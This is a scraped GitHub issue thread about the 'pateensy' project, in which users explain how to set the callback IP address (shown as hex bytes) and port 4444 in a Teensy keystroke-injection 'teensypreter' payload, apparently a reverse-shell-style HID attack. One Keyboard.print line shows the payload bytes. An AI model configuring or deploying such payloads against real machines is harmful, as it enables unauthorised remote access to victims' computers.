GithubHelp home page GithubHelp logo

teensypreter payload help about pateensy HOT 3 OPEN

screetsec avatar screetsec commented on June 16, 2024
teensypreter payload help

from pateensy.

Comments (3)

B3H1NDu avatar B3H1NDu commented on June 16, 2024

The [0x@@,0x@@,0x@@,0x@@] should be replaced by your IP in hex so,
Keyboard.print("[0x@@,0x@@,0x@@,0x@@],0x68,0x02,0x00,[0x@@,0x@@],0"); would become
Keyboard.print("0xC0,0xA8,0x01,0x01,0x68,0x02,0x00,[0x@@,0x@@],0");, if you had an IP address of 192.168.1.1.
I would use a converter like http://www.rapidtables.com/convert/number/decimal-to-hex.htm or http://ncalculators.com/digital-computation/ip-address-hex-decimal-binary.htm.
In both cases you would need to change your data to one byte to fit into the format. The commenting contains an explanation an example for the port, so I won't go into it.
Remember to remove the brackets.

from pateensy.

mrvirginis avatar mrvirginis commented on June 16, 2024

So the hex of port 4444 would be [0x11,0x5C] correct?

from pateensy.

B3H1NDu avatar B3H1NDu commented on June 16, 2024

It's been a while since I've played with this stuff, but yes that should be correct.

from pateensy.

Related Issues (3)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.